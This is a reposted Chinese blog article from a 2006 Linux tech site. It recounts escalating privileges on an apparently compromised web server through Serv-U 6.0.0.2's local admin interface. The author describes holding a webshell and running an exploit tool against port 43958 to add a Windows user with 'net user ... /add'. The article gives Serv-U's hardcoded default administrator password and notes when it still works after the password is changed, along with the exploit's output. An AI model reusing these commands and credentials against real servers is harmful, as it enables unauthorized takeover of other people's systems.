首页 | 资讯动态 | linux基础 | 系统管理 | 网络管理 | 编程开发 | linux数据库 | 服务器技术 | linux相关 | linux认证 | 嵌入式 | 下载中心 | 专题 | linux招聘 | HR | 镜像
OKLinux中文技术站
·设为首页
·加入收藏
·联系我们
系统管理: 中文环境 系统管理 桌面应用 内核技术 | Linux基础: 基础入门 安装配置 常用命令 经验技巧 软件应用 | Linux数据库: Mysql Postgre Oracle DB2 Sybase other
网络管理: 网络安全 网络应用 Linux服务器 环境配置 黑客安全 | 编程开发: PHP CC++ Python Perl Shell 嵌入式开发 java jsp | PHP技术: PHP基础 PHP技巧 PHP应用 PHP文摘
搜索中心 Linux招聘 Linux专题 Apache | Linux相关: 硬件相关 Linux解决方案 Linux认证 企业应用 其它Unix | 相关下载: 资料下载 参考手册 开发工具 服务器类 软路由 其它
 技术搜索:
会员中心 注册会员 高级搜索  
  → 当前位置:首页>服务器技术>FTP服务器>正文

对Serv-U6.0.0.2默认帐户及密码的理解

http://www.oklinux.cn  2006-06-23  oklinux收集 未知  会员收藏  游客收藏  【 】 
您查看的文章来源于http://www.oklinux.cn
天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini
[GLOBAL]
Version=6.0.0.2
OpenFilesDownloadMode=Exclusive
PacketTimeOut=300
LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39

6.0.0.2版的.曾经看到哪说6.0版的默认本地治理帐号和密码依旧是原来那个.可又似乎听谁说过6版的密码已经改了..

呵.这里发现.多出了一行Localsetuppassword.有种不详的预感.难道原来的默认密码已经通过它来设置了?加了MD5,算算纯数字倒还是可以.机会渺茫..

试试能不能写入...显示权限不足(一切都在预料之内).OK试试默认帐户和密码吧.

上传了xiaolu的那个serv-u权限提升工具

netstat -an |find "43958"
TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING

嗯,是这个口.

执行命令

D:/web/www/XXXX_com/serv-u.exe 43958 "net user xiaoqi amen. /add "
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
#l@$ak#.lk;0@P
>530 Not logged in.
******************************************************

看到530,心凉了一下,这么说来默认密码被改了.
上群里想获得一下确认.Superhei给了个很好的思路.下载主程序用UEDIT查看密码.
serv-u 6.0版之前要修改默认密码也是同样的方法,而且密码长度要求同样要求是14位(用其他字符替换#l@$ak#.lk;0@P)..
打开ServUAdmin.exe查了下,发现密码依旧是#l@$ak#.lk;0@P(特地复制到记事本观察,防止0/O l/1等字符混淆).确实没有变.
那么,看来Serv-u已经不依靠它来验证了?
为了找出真像.下载了一个Serv-U 6.0.0.2版(未装汉化,未破解,防止低版本汉化及破解补丁)


之前就在想,为什么Serv-U不可以提供一个让治理员修改密码的地方了?多少个服务器OVER的责任在Serv-U上啊?
好!这次来了,刚打开serv-u admin,发现在"停止服务"下面多了一个"设置更改密码"的按钮.
再来看看ServUDaemon.ini,除了版本改变了以外,与原来并没有不同之处.
回到控制台点开"设置更改密码"要求输入旧密码,新密码,确认.旧密码?旧密码是什么?#l@$ak#.lk;0@P吗?
提示密码不正确..怪了.试了下空密码...正确..这可把我郁闷了.难道在Serv-U 6.0.0.2里LocalAdministrator的密码就是空???
把xiaolu的权限提升工具拿来改了下,把密码改成空.编译好重新传了上去.

执行命令

D:/web/www/XXXX_com/serv-u2.exe 43958 "net user xiaoqi amen. /add "
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
>530 Not logged in.
******************************************************

依然是530.呵..真是在做梦啊我.不过这次失败并不能代表默认密码不为空(因为这台机器的配置文件中有LocalSetupPassword=)
好的.回过头,看了下我机器上的ServUDaemon.ini,果然多了一行Localsetuppassword=xxxxxxx,看来确是刚才配置密码的MD5了.把我机器上Serv-u的密码改成空的(竟然答应我空的)再用这个serv-u2.exe试了下.不行..530,脑中忽然闪过,难道"空"就是#l@$ak#.lk;0@P
操起serv-u.exe,yeah!成功.
到这里我们要开始怀疑一个问题了,假如修改了密码,那么就需要进行二次验证了?一次是#l@$ak#.lk;0@P 一次是修改完的密码.
呵..兴冲冲地跟superhei说了句"二次验证",修改了下那个权限提升工具,把其中的密码改为我在Serv-U中设置的密码,连上了.证实了没有进行二次验证.
总结一下,在Serv-U 6.0.0.2版本中,初始密码依旧是#l@$ak#.lk;0@P 但可以很方便地在Serv-U admin控制台修改密码,修改完密码,配置保存在ServUDaemon.ini的LocalSetupPassword=中.
原来的#l@$ak#.lk;0@P依旧保存只有当密码为空时使用.

另:要修改本地治理端口.只需要在ServUDaemon.ini中的[global]里加上一行LocalSetupPortNo=端口号,既可

btw: 这些没有技术含量的东西,希望大家多多原谅,原本写的一些东西只是想丢在blog里自己安慰安慰,大家转载完实在是折煞我了

上一篇:实战:全面保障FTP服务器的安全   下一篇:ftp操作常识问题集锦

收藏于收藏夹】 【评论】 【推荐】 【打印】 【关闭
相关文档
·ftp操作常识问题集锦
·实战:全面保障FTP服务器的安全
·轻松架设Windows2003用户隔离FTP服务器
·Windows中IIS内FTP服务器高级配置(图)
·内网Serv-U架站:实例解析FTP原理
·注重设置让FTP服务器共享更安全
·Serv-U3.0参数设置技巧
·服务器应用-网管的最爱GENE 6三(组图)
·Serv-U的安装和基本设置
·服务器应用-网管的最爱GENE 6二(组图)
·服务器应用-网管的最爱GENE 6一(组图)
·Windows下用sftp巧妙打造安全传输
·服务器应用:IIS建FTP服务器三(组图)
·服务器应用:IIS建FTP服务器二(组图)
·服务器应用:IIS建FTP服务器一(组图)
·服务器应用:用serv-u建立FTP二(组图)
发表评论
密码: 匿名评论
评论内容:

(不超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规)
 
  最新文档
·GeneFTP服务不支持中文目录巧解决
·校园网组网不求人FTP服务器的魅力
·FTP上传文件经常中断或超时的解决方案
·巧改传输模式解决FTP连接问题
·实现文件双向传输搭建FTP服务器
·Windows下IIS配置与Ftp服务搭建
·防病毒软件惹祸FTP空间突然不足
·从权限入手排障GENEFTP远程管理
·用Gene6让FTP服务搭建平民化
·FTP服务器安全
·FTP服务器软件Serv-U教程(1)
·用windows2000架设自己的FTP SERVER
  阅读排行
·Windows下IIS配置与Ftp服务搭建
·用Gene6让FTP服务搭建平民化
·Windows下用sftp巧妙打造安全传输
·FTP服务器软件Serv-U教程(1)
·如何配置FTP服务器
·使用IPsec与组策略隔离服务器和域
·Serv-U:快速构建功能强大FTP服务器
·FTP上传文件经常中断或超时的解决方案
·轻松架设Windows2003用户隔离FTP服务器
·Exchange 2003,你真的需要吗?(组图)
·FTP服务器软件Serv-U教程(2)
·Windows中IIS内FTP服务器高级配置
·巧改传输模式解决FTP连接问题
·实现文件双向传输搭建FTP服务器
·FTP服务器软件Server-U教程(3)
网摘收藏: